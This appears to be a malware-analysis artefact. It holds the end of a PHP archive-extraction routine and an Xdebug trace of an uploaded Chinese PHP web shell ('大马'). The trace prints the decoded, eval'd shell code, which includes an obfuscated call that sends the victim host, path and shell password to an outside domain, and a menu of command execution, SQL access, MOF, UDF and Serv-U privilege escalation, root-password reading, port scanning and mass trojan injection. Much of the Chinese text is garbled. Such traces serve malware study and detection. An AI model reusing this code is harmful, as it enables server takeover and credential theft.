                    $fp = @fopen($to . $header['filename'] . '.gz', 'wb');
                    if (!$fp) {
                        return -1;
                    }
                    $binary_data = pack('va1a1Va1a1', 0x8b1f, Chr($header['compression']), "\x00", time(), "\x00", "\x03");
                    fwrite($fp, $binary_data, 10);
                    $size = $header['compressed_size'];
                    while ($size != 0) {
                        $read_size = $size < 1024 ? $size : 1024;
                        $buffer = fread($zip, $read_size);
                        $binary_data = pack('a' . $read_size, $buffer);
                        @fwrite($fp, $binary_data, $read_size);
                        $size -= $read_size;
                    }
                    $binary_data = pack('VV', $header['crc'], $header['size']);
                    fwrite($fp, $binary_data, 8);
                    fclose($fp);
                    $gzp = @gzopen($to . $header['filename'] . '.gz', 'rb') or die("Cette archive est compress");
                    if (!$gzp) {
                        return -2;
                    }
                    $fp = @fopen($to . $header['filename'], 'wb');
                    if (!$fp) {
                        return -1;
                    }
                    $size = $header['size'];
                    while ($size != 0) {
                        $read_size = $size < 2048 ? $size : 2048;
                        $buffer = gzread($gzp, $read_size);
                        $binary_data = pack('a' . $read_size, $buffer);
                        @fwrite($fp, $binary_data, $read_size);
                        $size -= $read_size;
                    }
                    fclose($fp);
                    gzclose($gzp);
                    touch($to . $header['filename'], $header['mtime']);
                    @unlink($to . $header['filename'] . '.gz');
                }
            }
            $this->total_files++;
            echo "\xce\xc4\xbc\xfe: {$to}{$header['filename']}<br>";
            return true;
        }
    }
    ob_end_flush();
};
Execution traces
data/traces/45877fc902e458ffed29e1387cdbcff0_trace-1676249211.2031.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 22:47:17.100934]
1	0	1	0.000227	393688
1	3	0	0.000796	485536	{main}	1		/var/www/html/uploads/PHP大马-php_mof+SHELL.php	0	0
1		A						/var/www/html/uploads/PHP大马-php_mof+SHELL.php	2	$password = 'admin'
1		A						/var/www/html/uploads/PHP大马-php_mof+SHELL.php	3	$shellname = 'caidaome.com'
1		A						/var/www/html/uploads/PHP大马-php_mof+SHELL.php	4	$myurl = 'http://www.caidaome.com'
2	4	0	0.000859	485536	error_reporting	0		/var/www/html/uploads/PHP大马-php_mof+SHELL.php	5	1	5
2	4	1	0.000875	485576
2	4	R			22527
2	5	0	0.000889	485536	set_time_limit	0		/var/www/html/uploads/PHP大马-php_mof+SHELL.php	6	1	0
2	5	1	0.000905	485600
2	5	R			FALSE
2	6	0	0.000919	485568	header	0		/var/www/html/uploads/PHP大马-php_mof+SHELL.php	6	1	'content-Type: text/html; charset=gb2312'
2	6	1	0.000937	485744
2	6	R			NULL
2	7	0	0.000950	485712	base64_decode	0		/var/www/html/uploads/PHP大马-php_mof+SHELL.php	8	1	'7P37fxvXeSeO/6y8XvkfxhPGACIQnMEdpMBoMBhIlHgTSUmWRC0LAiAJETcDoEhK1h/jaPdT1/F+EtmSHVuWndhKfIttxVbs1K+0m6Zpt6k33W3STdom6evzfs5lbhiQlOxkt99vaYucOXPOc27PeW7nOc9pr670+uVuPxyZ+OIXjq7VG7WV9Vp/pdJu9Wutfi+8Wu7V0smVaq3SrtbCofLxBa1SbF+evnJKn71UScxeWU9NN2cvry5mx8rHtFwoEtvqNmotlntY2e18HvlGVhathTPWwoXQ8aWl+ZXjc4tLoYuu1Pnj83ieLiFRfeIJNTbSKfd62+1uNRJTH129ku9sdFRqdLW2Vm8BfHO3XK12a71eKOoAWTQXpuaXVkpT09asMWOFLn62ErXW5QY1AwXs1rg+9zZqjUar3Kzhu/3srRGjg4/sL3344hfqa+GjNOLN8nq9svL4Vrtf662sdyrhSOTqF79waK3drZUrG+GRlXkMkFLuKSObSn5SGbkc'
2	7	1	0.001236	575856
2	7	R			'�\033�y\'����^�\037�\023�\000"\020��\035��h0\030H�x\023II�D-\v\002 \t\0217\003�HJ�\037�h�S��~\022ْ\035[���J|�m�V�ԯ���i��7�m�M�&���~�en\030���d��oi��9s�sn�yn�9�i����n?\034���\027���\033���Z��n�k�~/�Z���ɕj�Ү�¡��\005�Rl_��rJ��TI�^YOM7g/�.f��Ǵ\\(\022��6j-�{X��|\036�FV\026��3�…����s�K������x�.!Q}�\t56�)�z��n5\022S\037]���ltTjt��Vo\001|s�\\�vk�^(�\000Y4\027��VJS�֬1c�.~�\022���\0065\003\005�ָ>�6j�F�ܬ��\021����/}��\027�k�4���z���V�_뭬w*�H��\027�ph�ݭ�+\033ᑕy\f�R�)#�J~R\031�\034Qxڅ�͋J^�'
2	8	0	0.002451	575824	gzinflate	0		/var/www/html/uploads/PHP大马-php_mof+SHELL.php	8	1	'�\033�y\'����^�\037�\023�\000"\020��\035��h0\030H�x\023II�D-\v\002 \t\0217\003�HJ�\037�h�S��~\022ْ\035[���J|�m�V�ԯ���i��7�m�M�&���~�en\030���d��oi��9s�sn�yn�9�i����n?\034���\027���\033���Z��n�k�~/�Z���ɕj�Ү�¡��\005�Rl_��rJ��TI�^YOM7g/�.f��Ǵ\\(\022��6j-�{X��|\036�FV\026��3�…����s�K������x�.!Q}�\t56�)�z��n5\022S\037]���ltTjt��Vo\001|s�\\�vk�^(�\000Y4\027��VJS�֬1c�.~�\022���\0065\003\005�ָ>�6j�F�ܬ��\021����/}��\027�k�4���z���V�_뭬w*�H��\027�ph�ݭ�+\033ᑕy\f�R�)#�J~R\031�\034Qxڅ�͋J^�'
2	8	1	0.004338	760176
2	8	R			'ob_start();\r\n@file_get_contents(base64_decode(\'aHR0cDovLzQ1Njc3Nzg5LmNvbS8/aG09\').urlencode(base64_decode(\'aHR0cDovLw==\').$_SERVER[\'HTTP_HOST\'].$_SERVER[\'PHP_SELF\']."||".$password)."&bz=php");\r\ndefine(\'myaddress\',$_SERVER[\'SCRIPT_FILENAME\']);\r\ndefine(\'myaddress\',$_SERVER[\'SCRIPT_FILENAME\']);\r\ndefine(\'envlpass\',$password);\r\ndefine(\'shellname\',$shellname);\r\ndefine(\'myurl\',$myurl);\r\n\r\nif(@get_magic_quotes_gpc()){\r\n\tforeach($_POST as $k => $v) $_POST[$k] = stripslashes($'
2	9	0	0.009091	1612880	eval	1	'ob_start();\r\n@file_get_contents(base64_decode(\'aHR0cDovLzQ1Njc3Nzg5LmNvbS8/aG09\').urlencode(base64_decode(\'aHR0cDovLw==\').$_SERVER[\'HTTP_HOST\'].$_SERVER[\'PHP_SELF\']."||".$password)."&bz=php");\r\ndefine(\'myaddress\',$_SERVER[\'SCRIPT_FILENAME\']);\r\ndefine(\'myaddress\',$_SERVER[\'SCRIPT_FILENAME\']);\r\ndefine(\'envlpass\',$password);\r\ndefine(\'shellname\',$shellname);\r\ndefine(\'myurl\',$myurl);\r\n\r\nif(@get_magic_quotes_gpc()){\r\n\tforeach($_POST as $k => $v) $_POST[$k] = stripslashes($v);\r\n\tforeach($_GET as $k => $v) $_GET[$k] = stripslashes($v);\r\n}\r\nif(isset($_REQUEST[envlpass])){\r\nhmlogin(2);\r\nexit;}\r\n\t if($_COOKIE[\'envlpass\'] != md5(envlpass)){\r\n\tif($_POST[\'envlpass\']){\r\n\t\tif($_POST[\'envlpass\'] == envlpass){\r\n\t\t\tsetcookie(\'envlpass\',md5($_POST[\'envlpass\']));\r\n\t\t\tcss_main();\r\n\t\t\thmlogin();\r\n\t\t\tdie;\r\n\t\t}else{\r\n\t\t\techo \'<CENTER>�û����������</CENTER>\';\r\n\t\t\t\r\n\t\t}\r\n\t}\r\n\tislogin($shellname,$myurl);\r\n\texit;\r\n\t\r\n}\r\n\r\n/*---End Login---*/\r\nif(isset($_GET[\'down\'])) do_down($_GET[\'down\']);\r\nif(isset($_GET[\'pack\'])){\r\n\t$dir = do_show($_GET[\'pack\']);\r\n\t$zip = new eanver($dir);\r\n\t$out = $zip->out;\r\n\tdo_download($out,"eanver.tar.gz");\r\n}\r\nif(isset($_GET[\'unzip\'])){\r\n\tcss_main();\r\n\tstart_unzip($_GET[\'unzip\'],$_GET[\'unzip\'],$_GET[\'todir\']);\r\n\texit;\r\n}\r\n\r\ndefine(\'root_dir\',str_replace(\'\\\\\',\'/\',dirname(myaddress)).\'/\');\r\ndefine(\'run_win\',substr(PHP_OS, 0, 3) == "WIN");\r\ndefine(\'my_shell\',str_path(root_dir.$_SERVER[\'SCRIPT_NAME\']));\r\n$eanver = isset($_GET[\'eanver\']) ? $_GET[\'eanver\'] : "";\r\n$doing = isset($_POST[\'doing\']) ? $_POST[\'doing\'] : "";\r\n$path = isset($_GET[\'path\']) ? $_GET[\'path\'] : root_dir;\r\n$name = isset($_POST[\'name\']) ? $_POST[\'name\'] : "";\r\n$img = isset($_GET[\'img\']) ? $_GET[\'img\'] : "";\r\n$p = isset($_GET[\'p\']) ? $_GET[\'p\'] : "";\r\n$pp = urlencode(dirname($p));\r\nif($img) css_img($img);\r\nif($eanver == "phpinfo") die(phpinfo());\r\nif($eanver == \'logout\'){\r\n\tsetcookie(\'envlpass\',null);\r\n\tdie(\'<meta http-equiv="refresh" content="0;URL=?">\');\r\n}\r\n\r\n$class = array(\r\n"��Ϣ���" => array("upfiles" => "�ϴ��ļ�","phpinfo" => "������Ϣ","info_f" => "ϵͳ��Ϣ","phpcode" => "ִ��PHP�ű�"),\r\n"��Ȩ����" => array("sqlshell" => "ִ��SQL���","mysql_exec" => "MYSQL���","othersql" => "�����ݿ�","myexp" => "MYSQL_UDF��Ȩ","winapi" => "WIN API��Ȩ","mofshell" => "Mof˫����Ȩ","cmd" => "ִ��CMD���","linux" => "������Ȩ","servu" => "Serv-U��Ȩ","readpass" => "��Ȩ�޶�root����","downloader" => "�ļ�����","port" => "�˿�ɨ��"),\r\n"������" => array("guama" => "�����������","tihuan" => "����滻����","scanfile" => "�������ļ�","scanphp" => "�������ľ��","zippak" => "zip��ѹ"),\r\n"�ű���" => array("getcode" => "��ȡ�ҳԴ��")\r\n);\r\n$msg = array("0" => "����ɹ�","1" => "����ʧ��","2" => "�ϴ��ɹ�","3" => "�ϴ�ʧ��","4" => "�޸ijɹ�","5" => "�޸�ʧ��","6" => "ɾ���ɹ�","7" => "ɾ��ʧ��");\r\ncss_main();\r\nswitch($eanver){\r\n\tcase "left":\r\n\tcss_left();\r\n\t\thtml_n("<dl><dt><a href=\\"#\\" onclick=\\"showHide(\'items1\');\\" target=\\"_self\\">");\r\n\t\thtml_img("title");html_n(" ����Ӳ��</a></dt><dd id=\\"items1\\" style=\\"display:block;\\"><ul>");\r\n    $ROOT_DIR = File_Mode();\r\n\r\n\tfor ($i=66;$i<=90;$i++){$drive= chr($i).\':\';\r\n    if (is_dir($drive."/")){$vol=File_Str("vol $drive");if(empty($vol))$vol=$drive;\r\n    html_n("<li><a title=\'$drive\' href=\'?eanver=main&path=$drive\' target=\'main\'>���ش���($drive)</a></li>");}}\r\n    \thtml_n("<li><a title=\'$ROOT_DIR\' href=\'?eanver=main&path=$ROOT_DIR\' target=\'main\'>�վ��Ŀ¼</a></li>");\r\n\thtml_n("<li><a href=\'?eanver=main\' target=\'main\'>������Ŀ¼</a></li>");\r\n\thtml_n("</ul></dd></dl>");\r\n\t$i = 2;\r\n\tforeach($class as $name => $array){\r\n\t\thtml_n("<dl><dt><a href=\\"#\\" onclick=\\"showHide(\'items$i\');\\" target=\\"_self\\">");\r\n\t\thtml_img("title");html_n(" $name</a></dt><dd id=\\"items$i\\" style=\\"display:block;\\"><ul>");\r\n\t\tforeach($array as $url => $value){\r\n\t\t\thtml_n("<li><a href=\\"?eanver=$url\\" target=\'main\'>$value</a></li>");\r\n\t\t}\r\n\t\thtml_n("</ul></dd></dl>");\r\n\t\t$i++;\r\n\t}\r\n\thtml_n("<dl><dt><a href=\\"#\\" onclick=\\"showHide(\'items$i\');\\" target=\\"_self\\">");\r\n\thtml_img("title");html_n(" ������</a></dt><dd id=\\"items$i\\" style=\\"display:block;\\"><ul>");\r\n\thtml_n("<li><a title=\'������\' href=\'http://www.caidaome.com/\' target=\\"main\\">������</a></li>");\r\n    html_n("<li><a title=\'��ȫ�˳�\' href=\'?eanver=logout\' target=\\"main\\">��ȫ�˳�</a></li>");\r\n\thtml_n("</ul></dd></dl>");\r\n\thtml_n("</div>");\r\n\tbreak;\r\n\r\n\tcase "main":\r\n\tcss_js("1");\r\nfunction getFilePermissions($file)\r\n{\r\n$perms = fileperms($file);\r\nif (($perms & 0xC000) == 0xC000) {\r\n    // Socket\r\n    $info = \'s\';\r\n} elseif (($perms & 0xA000) == 0xA000) {\r\n    // Symbolic Link\r\n    $info = \'l\';\r\n} elseif (($perms & 0x8000) == 0x8000) {\r\n    // Regular\r\n    $info = \'-\';\r\n} elseif (($perms & 0x6000) == 0x6000) {\r\n    // Block special\r\n    $info = \'b\';\r\n} elseif (($perms & 0x4000) == 0x4000) {\r\n    // Directory\r\n    $info = \'d\';\r\n} elseif (($perms & 0x2000) == 0x2000) {\r\n    // Character special\r\n    $info = \'c\';\r\n} elseif (($perms & 0x1000) == 0x1000) {\r\n    // FIFO pipe\r\n    $info = \'p\';\r\n} else {\r\n    // Unknown\r\n    $info = \'u\';\r\n}\r\n\r\n// Owner\r\n$info .= (($perms & 0x0100) ? \'r\' : \'-\');\r\n$info .= (($perms & 0x0080) ? \'w\' : \'-\');\r\n$info .= (($perms & 0x0040) ?\r\n            (($perms & 0x0800) ? \'s\' : \'x\' ) :\r\n            (($perms & 0x0800) ? \'S\' : \'-\'));\r\n\r\n// Group\r\n$info .= (($perms & 0x0020) ? \'r\' : \'-\');\r\n$info .= (($perms & 0x0010) ? \'w\' : \'-\');\r\n$info .= (($perms & 0x0008) ?\r\n            (($perms & 0x0400) ? \'s\' : \'x\' ) :\r\n            (($perms & 0x0400) ? \'S\' : \'-\'));\r\n\r\n// World\r\n$info .= (($perms & 0x0004) ? \'r\' : \'-\');\r\n$info .= (($perms & 0x0002) ? \'w\' : \'-\');\r\n$info .= (($perms & 0x0001) ?\r\n            (($perms & 0x0200) ? \'t\' : \'x\' ) :\r\n            (($perms & 0x0200) ? \'T\' : \'-\'));\r\n\r\nreturn $info;\r\n\r\n}\r\n\t\r\n\t$dir = @dir($path);\r\n\t$REAL_DIR = File_Str(realpath($path));\r\n\tif(!empty($_POST[\'actall\'])){echo \'<div class="actall">\'.File_Act($_POST[\'files\'],$_POST[\'actall\'],$_POST[\'inver\'],$REAL_DIR).\'</div>\';}\r\n\t$NUM_D = $NUM_F = 0;\r\n\tif(!$_SERVER[\'SERVER_NAME\']) $GETURL = \'\'; else $GETURL = \'http://\'.$_SERVER[\'SERVER_NAME\'].\'/\';\r\n\t$ROOT_DIR = File_Mode();\t\r\n\thtml_n("<table width=\\"100%\\" border=0 bgcolor=\\"#555555\\"><tr><td><form method=\'GET\'>��ַ:<input type=\'hidden\' name=\'eanver\' value=\'main\'>");\r\n\thtml_n("<input type=\'text\' size=\'80\' name=\'path\' value=\'$path\'> <input type=\'submit\' value=\'ת��\'></form>");\r\n\thtml_n("<form method=\'POST\' enctype=\\"multipart/form-data\\" action=\'?eanver=editr&p=".urlencode($path)."\'>");\r\n\thtml_n("<input type=\\"button\\" value=\\"�½��ļ�\\" onclick=\\"rusurechk(\'newfile.php\',\'?eanver=editr&p=".urlencode($path)."&refile=1&name=\');\\">&nbsp;<input type=\\"button\\" value=\\"�½�Ŀ¼\\" onclick=\\"rusurechk(\'newdir\',\'?eanver=editr&p=".urlencode($path)."&redir=1&name=\');\\">");\r\n\thtml_input("file","upfilet","","&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ");\r\n\thtml_input("submit","uploadt","�ϴ�");\r\n\tif(!empty($_POST[\'newfile\'])){\r\n\t\tif(isset($_POST[\'bin\'])) $bin = $_POST[\'bin\']; else $bin = "wb";\r\n        if (substr(PHP_VERSION,0,1)>=5){if(($_POST[\'charset\']==\'GB2312\') or ($_POST[\'charset\']==\'GBK\')){}else{$_POST[\'txt\'] = iconv("gb2312//IGNORE",$_POST[\'charset\'],$_POST[\'txt\']);}}\r\n\t\techo do_write($_POST[\'newfile\'],$bin,$_POST[\'txt\']) ? \'<br>\'.$_POST[\'newfile\'].\' \'.$msg[0] : \'<br>\'.$_POST[\'newfile\'].\' \'.$msg[1];\r\n\t\t@touch($_POST[\'newfile\'],@strtotime($_POST[\'time\']));\r\n\t}\r\n\thtml_n(\'</form></td></tr></table><form method="POST" name="fileall" id="fileall" action="?eanver=main&path=\'.$path.\'"><table width="100%" border=0 bgcolor="#555555"><tr height="25"><td width="35%"><b>\');\r\n\thtml_a(\'?eanver=main&path=\'.uppath($path),\'<b><font color=red>�ϼ�Ŀ¼</font></b>\');\r\n\thtml_n(\'</b></td><td align="center" width="15%"><b>���</b></td><td align="center" width="10%">\');\r\n\thtml_n(\'<b>�ļ�����</b></td><td align="center" width="15%"><b>�޸�ʱ��</b></td><td align="center" width="5%"><b>�ļ���С</b></td></tr>\');\r\n\twhile($dirs = @$dir->read()){\r\n\t\tif($dirs == \'.\' or $dirs == \'..\') continue;\r\n\t\t$dirpath = str_path("$path/$dirs");\r\n\t\tif(is_dir($dirpath)){\r\n\t\t\t$perm = getFilePermissions($dirpath)." ".substr(base_convert(fileperms($dirpath),10,8),-4);\r\n\t\t\t$filetime = @date(\'Y-m-d H:i:s\',@filemtime($dirpath));\r\n\t\t\t$dirpath = urlencode($dirpath);\r\n\t\t\thtml_n(\'<tr height="25"><td><input type="checkbox" name="files[]" value="\'.$dirs.\'">\');\r\n\t\t\thtml_img("dir");\r\n\t\t\thtml_a(\'?eanver=main&path=\'.$dirpath,$dirs);\r\n\t\t\thtml_n(\'</td><td align="center">\');\r\n\t\t\thtml_n("<a href=\\"#\\" onClick=\\"rusurechk(\'$dirs\',\'?eanver=rename&p=$dirpath&newname=\');return false;\\">���</a>");\r\n\t\t\thtml_n("<a href=\\"#\\" onClick=\\"rusuredel(\'$dirs\',\'?eanver=deltree&p=$dirpath\');return false;\\">ɾ��</a> ");\r\n\t\t\thtml_a(\'?pack=\'.$dirpath,\'��\');\r\n\t\t\thtml_n(\'</td><td align="center">\');\r\n\t\t\thtml_a(\'?eanver=perm&p=\'.$dirpath.\'&chmod=\'.$perm,$perm);\r\n\t\t\thtml_n(\'</td><td align="center">\'.$filetime.\'</td><td align="right">\');\r\n\t\t\thtml_n(\'</td></tr>\');\r\n\t\t\t$NUM_D++;\r\n\t\t}\r\n\t}\r\n\t@$dir->rewind();\r\n\twhile($files = @$dir->read()){\r\n\t\tif($files == \'.\' or $files == \'..\') continue;\r\n\t\t$filepath = str_path("$path/$files");\r\n\t\tif(!is_dir($filepath)){\r\n\t\t\t$fsize = @filesize($filepath);\r\n\t\t\t$fsize = File_Size($fsize);\r\n\t\t\t$perm  = getFilePermissions($dirpath)." ".substr(base_convert(fileperms($filepath),10,8),-4);\r\n\t\t\t$filetime = @date(\'Y-m-d H:i:s\',@filemtime($filepath));\r\n\t\t\t$Fileurls = str_replace(File_Str($ROOT_DIR.\'/\'),$GETURL,$filepath);\r\n\t\t\t$todir=$ROOT_DIR.\'/zipfile\';\r\n\t\t\t$filepath = urlencode($filepath);\r\n\t\t\t$it=substr($filepath,-3);\r\n\t\t\thtml_n(\'<tr height="25"><td><input type="checkbox" name="files[]" value="\'.$files.\'">\');\r\n\t\t\thtml_img(css_showimg($files));\r\n\t\t\thtml_a($Fileurls,$files,\' target="_blank" title="��"\');\r\n\t\t\thtml_n(\'</td><td align="center">\');\r\n            if(($it==\'.gz\') or ($it==\'zip\') or ($it==\'tar\') or ($it==\'.7z\'))\r\n\t\t\t   html_a(\'?unzip=\'.$filepath,\'��ѹ\',\'title="��ѹ\'.$files.\'" onClick="rusurechk(\\\'\'.$todir.\'\\\',\\\'?unzip=\'.$filepath.\'&todir=\\\');return false;"\');\r\n\t\t\telse\r\n           \thtml_a(\'?eanver=editr&p=\'.$filepath,\'�༭\',\'title="�༭\'.$files.\'"\');\r\n\t\t\thtml_n("<a href=\\"#\\" onClick=\\"rusurechk(\'$files\',\'?eanver=rename&p=$filepath&newname=\');return false;\\">���</a>");\r\n\t\t\thtml_n("<a href=\\"#\\" onClick=\\"rusurechk(\'".urldecode($filepath)."\',\'?eanver=copy&p=$filepath&newcopy=\');return false;\\">����</a>");\r\n\t\t\thtml_n("<a href=\\"#\\" onClick=\\"rusuredel(\'$files\',\'?eanver=del&p=$filepath\');return false;\\">ɾ��</a> ");\r\n           \thtml_a(\'?down=\'.$filepath,\'����\',\'�༭\',\'title="����\'.$files.\'"\');\r\n\t\t\thtml_n(\'</td><td align="center">\');\r\n\t\t\thtml_a(\'?eanver=perm&p=\'.$filepath.\'&chmod=\'.$perm,$perm);\r\n\t\t\thtml_n(\'</td><td align="center">\'.$filetime.\'</td><td align="center">\');\r\n\t\t\thtml_a(\'?down=\'.$filepath,$fsize,\'title="����\'.$files.\'"\');\r\n\t\t\thtml_n(\'</td></tr>\');\r\n\t\t\t$NUM_F++;\r\n\t\t}\r\n\t}\r\n\t@$dir->close();\r\n\tif(!$Filetime) $Filetime = gmdate(\'Y-m-d H:i:s\',time() + 3600 * 8);\r\nprint<<<END\r\n</table>\r\n<div class="actall"> <input type="hidden" id="actall" name="actall" value="undefined"> \r\n<input type="hidden" id="inver" name="inver" value="undefined"> \r\n<input name="chkall" value="on" type="checkbox" onclick="CheckAll(this.form);"> \r\n<input type="button" value="����" onclick="SubmitUrl(\'�����ѡ�ļ���·��: \',\'{$REAL_DIR}\',\'a\');return false;"> \r\n<input type="button" value="ɾ��" onclick="Delok(\'�ѡ�ļ�\',\'b\');return false;"> \r\n<input type="button" value="����" onclick="SubmitUrl(\'�޸��ѡ�ļ�����ֵΪ: \',\'0666\',\'c\');return false;"> \r\n<input type="button" value="ʱ��" onclick="CheckDate(\'{$Filetime}\',\'d\');return false;"> \r\n<input type="button" value="��" onclick="SubmitUrl(\'��������ѡ�ļ������Ϊ: \',\'{$_SERVER[\'SERVER_NAME\']}.tar.gz\',\'e\');return false;">\r\nĿ¼({$NUM_D}) / �ļ�({$NUM_F})</div> \r\n</form> \r\nEND;\r\n\tbreak;\r\n\t\r\n\tcase "editr":\r\n\tcss_js("2");\r\n\tif(!empty($_POST[\'uploadt\'])){\r\n\t\techo @copy($_FILES[\'upfilet\'][\'tmp_name\'],str_path($p.\'/\'.$_FILES[\'upfilet\'][\'name\'])) ? html_a("?eanver=main",$_FILES[\'upfilet\'][\'name\'].\' \'.$msg[2]) : msg($msg[3]);\r\n\t\tdie(\'<meta http-equiv="refresh" content="1;URL=?eanver=main&path=\'.urlencode($p).\'">\');\r\n\t}\r\n\tif(!empty($_GET[\'redir\'])){\r\n        $name=$_GET[\'name\'];\r\n\t\t$newdir = str_path($p.\'/\'.$name);\r\n\t\t@mkdir($newdir,0777) ? html_a("?eanver=main",$name.\' \'.$msg[0]) : msg($msg[1]);\r\n\t\tdie(\'<meta http-equiv="refresh" content="1;URL=?eanver=main&path=\'.urlencode($p).\'">\');\r\n\t}\r\n\r\n\tif(!empty($_GET[\'refile\'])){\r\n        $name=$_GET[\'name\'];\r\n\t\t$jspath=urlencode($p.\'/\'.$name);\r\n\t\t$pp = urlencode($p);\r\n\t\t$p = str_path($p.\'/\'.$name);\r\n\t\t$FILE_CODE = "";\r\n\t\t$charset= \'GB2312\';\r\n        $FILE_TIME =date(\'Y-m-d H:i:s\',time()+3600*8);\r\n\t\tif(@file_exists($p)) echo \'����Ŀ¼����"ͬ�"�ļ�<br>\';\r\n\t}else{\r\n\t\t$jspath=urlencode($p);\r\n\t\t$FILE_TIME = date(\'Y-m-d H:i:s\',filemtime($p));\r\n        $FILE_CODE=@file_get_contents($p);\r\n\t     if (substr(PHP_VERSION,0,1)>=5){\r\n            if(empty($_GET[\'charset\'])){\r\n\t\t\t   if(TestUtf8($FILE_CODE)>1){$charset= \'UTF-8\';$FILE_CODE = iconv("UTF-8","gb2312//IGNORE",$FILE_CODE);}else{$charset= \'GB2312\';}\r\n\t\t\t  }else{\r\n\t\t\t   if($_GET[\'charset\']==\'GB2312\'){$charset= \'GB2312\';}else{$charset= $_GET[\'charset\'];$FILE_CODE = iconv($_GET[\'charset\'],"gb2312//IGNORE",$FILE_CODE);}\r\n\t\t\t  }\r\n\t\t  }\r\n        $FILE_CODE = htmlspecialchars($FILE_CODE);\r\n\t}\r\nprint<<<END\r\n<div class="actall">��������: <input name="searchs" type="text" value="{$dim}" style="width:500px;">\r\n<input type="button" value="����" onclick="search(searchs.value)"></div>\r\n<form method=\'POST\' id="editor"  action=\'?eanver=main&path={$pp}\'>\r\n<div class="actall">\r\n<input type="text" name="newfile"  id="newfile" value="{$p}" style="width:750px;">ָ�����룺<input name="charset" id="charset" value="{$charset}" Type="text" style="width:80px;" onkeydown="if(event.keyCode==13)window.location=\'?eanver=editr&p={$jspath}&charset=\'+this.value;">\r\n<input type="button" value="ѡ��" onclick="window.location=\'?eanver=editr&p={$jspath}&charset=\'+this.form.charset.value;" style="width:50px;"> \r\nEND;\r\nhtml_select(array("GB2312" => "GB2312","UTF-8" => "UTF-8","BIG5" => "BIG5","EUC-KR" => "EUC-KR","EUC-JP" => "EUC-JP","SHIFT-JIS" => "SHIFT-JIS","WINDOWS-874" => "WINDOWS-874","ISO-8859-1" => "ISO-8859-1"),$charset,"onchange=\\"window.location=\'?eanver=editr&p={$jspath}&charset=\'+options[selectedIndex].value;\\"");\r\nprint<<<END\r\n</div>\r\n<div class="actall"><textarea name="txt" style="width:100%;height:380px;">{$FILE_CODE}</textarea></div>\r\n<div class="actall">�ļ��޸�ʱ�� <input type="text" name="time" id="mtime" value="{$FILE_TIME}" style="width:150px;"> <input type="checkbox" name="bin" value="wb+" size="" checked>�Զ�������ʽ�����ļ�(����ʹ��)</div>\r\n<div class="actall"><input type="button" value="����" onclick="CheckDate();" style="width:80px;"> <input name=\'reset\' type=\'reset\' value=\'����\'> \r\n<input type="button" value="����" onclick="window.location=\'?eanver=main&path={$pp}\';" style="width:80px;"></div>\r\n</form>\r\nEND;\r\n\tbreak;\r\n\t\r\n\tcase "rename":\r\n\thtml_n("<tr><td>");\r\n\t$newname = urldecode($pp).\'/\'.urlencode($_GET[\'newname\']);\r\n\t@rename($p,$newname) ? html_a("?eanver=main&path=$pp",urlencode($_GET[\'newname\']).\' \'.$msg[4]) : msg($msg[5]);\r\n\tdie(\'<meta http-equiv="refresh" content="1;URL=?eanver=main&path=\'.$pp.\'">\');\r\n\tbreak;\r\n\t\r\n\tcase "deltree":\r\n\thtml_n("<tr><td>");\r\n\tdo_deltree($p) ? html_a("?eanver=main&path=$pp",$p.\' \'.$msg[6]) : msg($msg[7]);\r\n\tdie(\'<meta http-equiv="refresh" content="1;URL=?eanver=main&path=\'.$pp.\'">\');\r\n\tbreak;\r\n\t\r\n\tcase "del":\r\n\thtml_n("<tr><td>");\r\n\t@unlink($p) ? html_a("?eanver=main&path=$pp",$p.\' \'.$msg[6]) : msg($msg[7]);\r\n\tdie(\'<meta http-equiv="refresh" content="1;URL=?eanver=main&path=\'.$pp.\'">\');\r\n\tbreak;\r\n\t\r\n\tcase "copy":\r\n\thtml_n("<tr><td>");\r\n\t$newpath = explode(\'/\',$_GET[\'newcopy\']);\r\n\t$pathr[0] = $newpath[0];\r\n\tfor($i=1;$i < count($newpath);$i++){\r\n\t\t$pathr[] = urlencode($newpath[$i]);\r\n\t}\r\n\t$newcopy = implode(\'/\',$pathr);\r\n\t@copy($p,$newcopy) ? html_a("?eanver=main&path=$pp",$newcopy.\' \'.$msg[4]) : msg($msg[5]);\r\n\tdie(\'<meta http-equiv="refresh" content="1;URL=?eanver=main&path=\'.$pp.\'">\');\r\n\tbreak;\r\n\t\r\n\tcase "perm":\r\n\thtml_n("<form method=\'POST\'><tr><td>".$p.\' ����Ϊ: \');\r\n\tif(is_dir($p)){\r\n\t\thtml_select(array("0777" => "0777","0755" => "0755","0555" => "0555"),$_GET[\'chmod\']);\r\n\t}else{\r\n\t\thtml_select(array("0666" => "0666","0644" => "0644","0444" => "0444"),$_GET[\'chmod\']);\r\n\t}\r\n\thtml_input("submit","save","�޸�");\r\n\tback();\r\n\tif($_POST[\'class\']){\r\n\t\tswitch($_POST[\'class\']){\r\n\t\t\tcase "0777": $change = @chmod($p,0777); break;\r\n\t\t\tcase "0755": $change = @chmod($p,0755); break;\r\n\t\t\tcase "0555": $change = @chmod($p,0555); break;\r\n\t\t\tcase "0666": $change = @chmod($p,0666); break;\r\n\t\t\tcase "0644": $change = @chmod($p,0644); break;\r\n\t\t\tcase "0444": $change = @chmod($p,0444); break;\r\n\t\t}\r\n\t\t$change ? html_a("?eanver=main&path=$pp",$msg[4]) : msg($msg[5]);\r\n\t\tdie(\'<meta http-equiv="refresh" content="1;URL=?eanver=main&path=\'.$pp.\'">\');\r\n\t}\r\n\thtml_n("</td></tr></form>");\r\n\tbreak;\r\n\r\n    case "info_f":\r\n\r\nfunction Info_Cfg($varname){\r\nswitch($result = get_cfg_var($varname)){\r\n\tcase 0:return "No";break;\r\n\tcase 1:return "Yes";break;\r\n\tdefault:return $result;break;}}\r\nfunction Info_Fun\r\n($funName){return(false !==function_exists($funName)) ? "Yes" : "No";}\r\n\r\n\r\n\r\n$dis_func = get_cfg_var("disable_functions");\r\n\r\n$upsize = get_cfg_var("file_uploads") ? get_cfg_var("upload_max_filesize") : "�������ϴ�";\r\n\r\n$adminmail = (isset($_SERVER[\'SERVER_ADMIN\'])) ? "<a href=\\"mailto:".$_SERVER[\'SERVER_ADMIN\']."\\">".$_SERVER\r\n[\'SERVER_ADMIN\']."</a>" : "<a href=\\"mailto:".get_cfg_var("sendmail_from")."\\">".get_cfg_var("sendmail_from")."</a>";\r\n\r\nif($dis_func == "")\r\n{$dis_func = "No";\r\n}\r\nelse{\r\n\t$dis_func = str_replace(" ","<br>",$dis_func);\r\n\r\n\t$dis_func = str_replace(",","<br>",$dis_func);\r\n\r\n}\r\n\r\n$phpinfo = 